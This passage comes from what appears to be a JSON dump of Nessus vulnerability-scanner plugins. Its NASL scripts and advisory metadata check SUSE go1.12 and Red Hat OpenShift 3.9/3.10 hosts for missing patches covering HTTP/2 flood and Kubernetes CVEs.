audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"go1.12-race-1.12.9-1.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"go1.12-1.12.9-1.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"go1.12-doc-1.12.9-1.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"go1.12-1.12.9-1.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"go1.12-doc-1.12.9-1.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"go1.12-race-1.12.9-1.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"go1.12-1.12.9-1.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"go1.12-doc-1.12.9-1.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"go1.12-1.12.9-1.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"go1.12-doc-1.12.9-1.15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"go1.12\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:25:54", "description": "An update for atomic-openshift is now available for Red Hat OpenShift Container Platform 3.10.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\n* kubernetes: API server allows access to cluster-scoped custom resources as if resources were namespaced (CVE-2019-11247)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAll OpenShift Container Platform 3.10 users are advised to upgrade to these updated packages and images.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-09-16T00:00:00", "type": "nessus", "title": "RHEL 7 : OpenShift Container Platform 3.10 (RHSA-2019:2690) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11247", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:atomic-openshift", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients-redistributable", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-docker-excluder", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-excluder", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-hyperkube", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-hypershift", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-master", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-pod", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-sdn-ovs", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-template-service-broker", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-tests", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-2690.NASL", "href": "https://www.tenable.com/plugins/nessus/128849", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:2690. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128849);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-11247\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:2690\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.10 (RHSA-2019:2690) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for atomic-openshift is now available for Red Hat OpenShift\nContainer Platform 3.10.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\n* kubernetes: API server allows access to cluster-scoped custom\nresources as if resources were namespaced (CVE-2019-11247)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nAll OpenShift Container Platform 3.10 users are advised to upgrade to\nthese updated packages and images.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:2690\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-11247\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11247\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-docker-excluder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-excluder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-hypershift\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-pod\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-sdn-ovs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-template-service-broker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:2690\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_exists(rpm:\"atomic-openshift-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-clients-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-clients-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-clients-redistributable-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-clients-redistributable-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-docker-excluder-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"atomic-openshift-docker-excluder-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-excluder-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"atomic-openshift-excluder-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-hyperkube-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-hyperkube-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-hypershift-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-hypershift-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-master-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-master-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-node-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-node-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-pod-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-pod-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-sdn-ovs-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-sdn-ovs-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-template-service-broker-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-template-service-broker-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-tests-3.10\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-tests-3.10.170-1.git.0.8e592d6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"atomic-openshift / atomic-openshift-clients / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:29:05", "description": "An security update is now available for Red Hat OpenShift Container Platform 3.9.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nThis advisory contains RPM packages for Red Hat OpenShift Container Platform 3.9, which have been rebuilt with an updated version of golang.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\n* kubernetes: API server allows access to cluster-scoped custom resources as if resources were namespaced (CVE-2019-11247)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-10-24T00:00:00", "type": "nessus", "title": "RHEL 7 : OpenShift Container Platform 3.9 (RHSA-2019:2769) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11247", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:ansible-service-broker", "p-cpe:/a:redhat:enterprise_linux:ansible-service-broker-container-scripts", "p-cpe:/a:redhat:enterprise_linux:ansible-service-broker-selinux", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients-redistributable", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-cluster-capacity", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-descheduler", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-docker-excluder", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-dockerregistry", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-excluder", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-federation-services", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-master", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node-problem-detector", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-pod", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-sdn-ovs", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-service-catalog", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-template-service-broker", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-tests", "p-cpe:/a:redhat:enterprise_linux:atomic-openshift-web-console", "p-cpe:/a:redhat:enterprise_linux:cockpit-debuginfo", "p-cpe:/a:redhat:enterprise_linux:cockpit-kubernetes", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debuginfo", "p-cpe:/a:redhat:enterprise_linux:cri-o", "p-cpe:/a:redhat:enterprise_linux:cri-o-debuginfo", "p-cpe:/a:redhat:enterprise_linux:cri-tools", "p-cpe:/a:redhat:enterprise_linux:cri-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-oauth-proxy", "p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-prometheus-alert-buffer", "p-cpe:/a:redhat:enterprise_linux:golang-github-prometheus-promu", "p-cpe:/a:redhat:enterprise_linux:hawkular-openshift-agent", "p-cpe:/a:redhat:enterprise_linux:heapster", "p-cpe:/a:redhat:enterprise_linux:image-inspector", "p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-image-registry", "p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter", "p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-efs-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-local-provisioner", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-controller", "p-cpe:/a:redhat:enterprise_linux:openshift-external-storage-snapshot-provisioner", "p-cpe:/a:redhat:enterprise_linux:openvswitch-ovn-kubernetes", "p-cpe:/a:redhat:enterprise_linux:prometheus", "p-cpe:/a:redhat:enterprise_linux:prometheus-alertmanager", "p-cpe:/a:redhat:enterprise_linux:prometheus-node-exporter", "p-cpe:/a:redhat:enterprise_linux:prometheus-promu", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-2769.NASL", "href": "https://www.tenable.com/plugins/nessus/130185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:2769. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130185);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-11247\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:2769\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.9 (RHSA-2019:2769) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An security update is now available for Red Hat OpenShift Container\nPlatform 3.9.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nThis advisory contains RPM packages for Red Hat OpenShift Container\nPlatform 3.9, which have been rebuilt with an updated version of\ngolang.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\n* kubernetes: API server allows access to cluster-scoped custom\nresources as if resources were namespaced (CVE-2019-11247)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:2769\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-11247\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11247\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansible-service-broker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansible-service-broker-container-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansible-service-broker-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-cluster-capacity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-descheduler\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-docker-excluder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-dockerregistry\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-excluder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-federation-services\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node-problem-detector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-pod\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-sdn-ovs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-service-catalog\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-template-service-broker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-web-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cockpit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cockpit-kubernetes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-o\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-o-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-oauth-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-prometheus-alert-buffer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-github-prometheus-promu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hawkular-openshift-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:heapster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:image-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-image-registry\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter-debuginfo\");\n 